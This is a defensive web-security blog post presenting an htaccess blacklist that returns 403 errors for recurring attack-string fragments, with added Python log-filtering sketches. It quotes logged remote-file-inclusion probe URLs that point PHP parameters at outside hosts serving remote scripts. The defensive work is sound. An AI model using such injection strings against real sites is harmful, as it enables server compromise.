Since posting the Ultimate htaccess Blacklist and then the Ultimate htaccess Blacklist 2, I find myself dealing with a new breed of malicious attacks. It is no longer useful to simply block nefarious user agents because they are frequently faked. Likewise, blocking individual IP addresses is generally a waste of time because the attacks are coming from a decentralized network of zombie machines. Watching my error and access logs very closely, I have observed the following trends in current attacks:
- User agents are faked, typically spoofing something generic
- Each attack may involve hundreds of compromised IP addresses
- Attacks generally target a large number of indexed (i.e., known) pages, posts, etc.
- Frequently, attacks utilize query strings appended to variously named PHP files
- The target URLs often include a secondary URL appended to the end of a permalink
- An increasing number of attacks employ random character strings to probe for holes
Yet despite the apparent complexity of such attacks, they tend to look remarkably similar. Specifically, notice the trends in the following examples of (nonexistent) target URLs, or “attack strings,” as I like to call them:
```
http://perishablepress.com/press/tag/tutorial/menu.php?http://www.lexiaintl.org/templates/css/test.txt?
http://perishablepress.com/press/2008/01/13/like-spider-pig/home.php?p=http://www.rootsfestival.no/.s/n?
http://perishablepress.com/press/wp-content/images/2006/feed-collection/feed-icon_orange-28px.png%20alt=
http://perishablepress.com/press/2007/08/29/stop-wordpress-from-leaking-pagerank-to-admin-pages/admin/doeditconfig.php
http://perishablepress.com/press/2007/07/29/slideshow-code-for-dead-letter-art/http://cccryuan1918ssdf.nightmail.ru/babyboy/?
http://perishablepress.com/press/tag/upgrade/includes/db_connect.php?baseDir=http://www.stempel-immobilien.de/images/mambo??
http://perishablepress.com/press/2007/12/17/how-to-enable-php-error-logging-via-htaccess/indexhttp://hellinsoloradio.com/test.txt?
http://perishablepress.com/press/tag/php/components/com_webring/admin.webring.docs.php?component_dir=http://www.cartographia.org/ftp/files/source/SinG??
http://perishablepress.com/press/2007/11/14/easily-adaptable-wordpress-loop-templates/home.php?menu=http://www.zojoma.com/gjestebok/img/response?%0D?
http://perishablepress.com/press/2007/10/15/ultimate-htaccess-blacklist-2-compressed-version/1x2n6l6bx6nt//001mAFC(-~l-xAou6.oCqAjB4ukkmrntoz1A//0011C/uikqijg4InjxGu.k
http://perishablepress.com/press/2006/06/14/the-htaccess-rules-for-all-wordpress-permalinks//wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.mecad.es/bo??
http://perishablepress.com/press/2007/10/15/ultimate-htaccess-blacklist-2-compressed-version/x%7b.//000Ooz,m4//000____::um,qymuxH%3bmJ.5G+D//001F00Dox%7b1rF9DrEtxmn7unwp%7dqDr/
http://perishablepress.com/press/2007/07/17/wp-shortstat-slowing-down-root-index-pages/members/plugins/payment/secpay/config.inc.php?config%5brhttp://www.algebramovie.com/images/test.txt???
```
Now imagine hundreds or even thousands of requests for each of these different URL variations, each targeting a different preexisting resource. So, for example, using the first attack string from our list, such an attack would generate the following log entries:
```
http://example.com/2007/01/29/fun-with-the-dos-command-prompt/menu.php?http://www.lexiaintl.org/templates/css/test.txt?
http://example.com/2006/11/01/addmysite-plugin-for-wordpress/menu.php?http://www.lexiaintl.org/templates/css/test.txt?
http://example.com/2006/11/20/add-rss-feed-link-icons/menu.php?http://www.lexiaintl.org/templates/css/test.txt?
http://example.com/2006/01/10/stupid-htaccess-tricks/menu.php?http://www.lexiaintl.org/templates/css/test.txt?
http://example.com/tag/tutorial/menu.php?http://www.lexiaintl.org/templates/css/test.txt?
. . . [ + many more ]
```
Associated with each of these requests is a unique (or semi-unique) IP address and a faked user agent. Occasionally, such attacks are executed from a single machine or small network, in which case the user agent for each entry is typically randomized to evade user-agent-based blacklists. More typically, however, current spammer and cracker attacks employ a virtually “unblockable” array of user agents and IP addresses. In short, blacklisting methods that rely on either of these variables are becoming increasingly ineffective at stopping malicious attacks.
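The log entries above share one trait that no amount of IP or user-agent spoofing can hide: a second URL embedded in the request itself. As a quick illustration (not part of the original article, and the sample log lines are hypothetical), here is how that telltale pattern can be spotted in Combined Log Format entries:

```python
import re

# Flag any logged request whose path/query contains an embedded full URL
# (an "http://" appearing inside the request line). The two sample log
# lines below are hypothetical Combined Log Format entries.
embedded_url = re.compile(r'"GET [^"]*http://', re.IGNORECASE)

sample_lines = [
    '1.2.3.4 - - [13/Jan/2008:00:00:01 -0500] "GET /press/tag/tutorial/menu.php?http://www.lexiaintl.org/test.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '5.6.7.8 - - [13/Jan/2008:00:00:02 -0500] "GET /press/about/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

suspicious = [line for line in sample_lines if embedded_url.search(line)]
print(len(suspicious))  # only the first request carries an embedded URL
```

Running a filter like this over a real access log is one way to harvest candidate attack strings for the blacklist discussed below.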
A Second Generation Blacklist
Given these observations, I have adopted a new strategy for dealing with this “new breed” of malicious attacks. Instead of targeting zillions of IP addresses and/or user agents for blacklisting, I am now identifying recurring attack-string patterns and blocking them via the redirectmatch directive of Apache’s powerful mod_alias module, using rules of this general form:

```apache
redirectmatch 403 attackstring1
redirectmatch 403 attackstring2
redirectmatch 403 attackstring3
```
By blocking key portions of the actual strings used in an attack, we are targeting an “unfakable” variable and preventing its use in any capacity. For example, referring to our previously given collection of attack strings, we are able to block almost the entire collection with a single line of code:

```apache
redirectmatch 403 http\:\/\/
```
Within the context of current server-exploitation techniques, that one line of code is an immensely powerful weapon for closing the door on malicious attacks. By focusing our blacklisting efforts directly on the attack vector itself, we employ a strategy that transcends the emergent complexity and variation inherent among intrinsic attack parameters. They can fake the user agents, the IP addresses, and just about everything else, but they can’t fake the (potential) targets of their attacks. Attack strings contain patterns that remain far more constant than previously targeted variables. And it gets even better..
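To see how much work that one rule does, the same regex can be simulated against the request portions of our sample attack strings (a sketch of mine, not from the original article; the paths are taken from the examples above):

```python
import re

# The blacklist rule `redirectmatch 403 http\:\/\/` is simply a regex
# match against the requested URL; simulate it here in Python.
pattern = re.compile(r'http\:\/\/')

attack_strings = [
    "/press/tag/tutorial/menu.php?http://www.lexiaintl.org/templates/css/test.txt?",
    "/press/2008/01/13/like-spider-pig/home.php?p=http://www.rootsfestival.no/.s/n?",
    "/press/wp-content/images/2006/feed-collection/feed-icon_orange-28px.png%20alt=",
]

blocked = [s for s in attack_strings if pattern.search(s)]
print(len(blocked))  # 2 of the 3 contain an embedded http:// and would be denied
```

The third string slips past this particular rule, which is why the full blacklist below also targets fragments such as `alt\=`.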
Presenting the 2G Blacklist
For several months now, I have been harvesting key portions of malicious attack strings from my access logs and adding them to my new and improved “2G” blacklist. After the addition of each new string, I take as much time as possible to test the effectiveness of the block and ensure that it doesn’t interfere with normal functionality. Although highly effective in its current state, the 2G Blacklist is a work in progress. As time goes on, this blacklisting method will certainly evolve to keep up with the rapidly changing arsenal of spammer and cracker attacks. To stay current with this and many other security measures, I encourage you to subscribe to Perishable Press. As mentioned, this blacklist is designed for Apache servers equipped with the mod_alias module. You will need access to your site’s root htaccess file, into which you simply copy & paste the following code:
```apache
# 2G Blacklist from Perishable Press
<IfModule mod_alias.c>
redirectmatch 403 \.inc
redirectmatch 403 alt\=
redirectmatch 403 http\:\/\/
redirectmatch 403 menu\.php
redirectmatch 403 main\.php
redirectmatch 403 file\.php
redirectmatch 403 home\.php
redirectmatch 403 view\.php
redirectmatch 403 about\.php
redirectmatch 403 order\.php
redirectmatch 403 index2\.php
redirectmatch 403 errors\.php
redirectmatch 403 config\.php
redirectmatch 403 button\.php
redirectmatch 403 middle\.php
redirectmatch 403 threads\.php
redirectmatch 403 contact\.php
redirectmatch 403 display\.cgi
redirectmatch 403 display\.php
redirectmatch 403 include\.php
redirectmatch 403 register\.php
redirectmatch 403 db_connect\.php
redirectmatch 403 doeditconfig\.php
redirectmatch 403 send\_reminders\.php
redirectmatch 403 admin_db_utilities\.php
redirectmatch 403 admin\.webring\.docs\.php
redirectmatch 403 keds\.lpti
redirectmatch 403 r\.verees
redirectmatch 403 pictureofmyself
redirectmatch 403 remoteFile
redirectmatch 403 mybabyboy
redirectmatch 403 mariostar
redirectmatch 403 zaperyan
redirectmatch 403 babyboy
redirectmatch 403 aboutme
redirectmatch 403 xAou6
redirectmatch 403 qymux
</IfModule>
```
A brief rundown of what we are doing here.. First, notice that the entire list is enclosed in an IfModule test container; this ensures that your site will not crash if for some reason mod_alias becomes unavailable. The list itself is elegantly simple. Each line targets a specific string of characters that, if matched in the URL, returns a 403 (Forbidden) HTTP error code. Nice, clean, and easy.
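Because each rule is just a literal fragment with its regex metacharacters escaped, new strings harvested from your logs can be converted into blacklist lines mechanically. A minimal sketch (the helper name and workflow are my own illustration, not part of the original article):

```python
import re

def redirectmatch_rule(fragment: str) -> str:
    """Build a `redirectmatch 403` line from a harvested attack-string fragment.

    re.escape() backslash-escapes regex metacharacters (such as the dot)
    so the fragment is matched literally, mirroring the style of the
    2G Blacklist entries above.
    """
    return "redirectmatch 403 " + re.escape(fragment)

print(redirectmatch_rule("db_connect.php"))  # redirectmatch 403 db_connect\.php
```

Generating rules this way avoids the easy mistake of leaving an unescaped dot in a filename, which would silently match any character.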
Although highly effective at stopping many attacks, this blacklist is merely another useful tool in the ongoing hellish battle against the evil forces of the nefarious online underworld. It is meant to complement existing methods, not replace them. Is there still benefit from blocking certain ranges of IPs? Yes, subscribe to my friend Will Macc over at A Daily Rant to understand why. Is there still benefit from blocking certain user agents? Yes, many spammers, scrapers and crackers have yet to spoof this aspect of their game — there are many well-known and well-hated user agents that should be banned. Is there still benefit from blocking individual IP addresses? As discussed elsewhere at Perishable Press, yes, crackers and attackers have their favorite locations and certain zombie machines are easier to manipulate than others. It is in addition to these tools, then, that the 2G Blacklist serves as a solid defense against malicious attacks.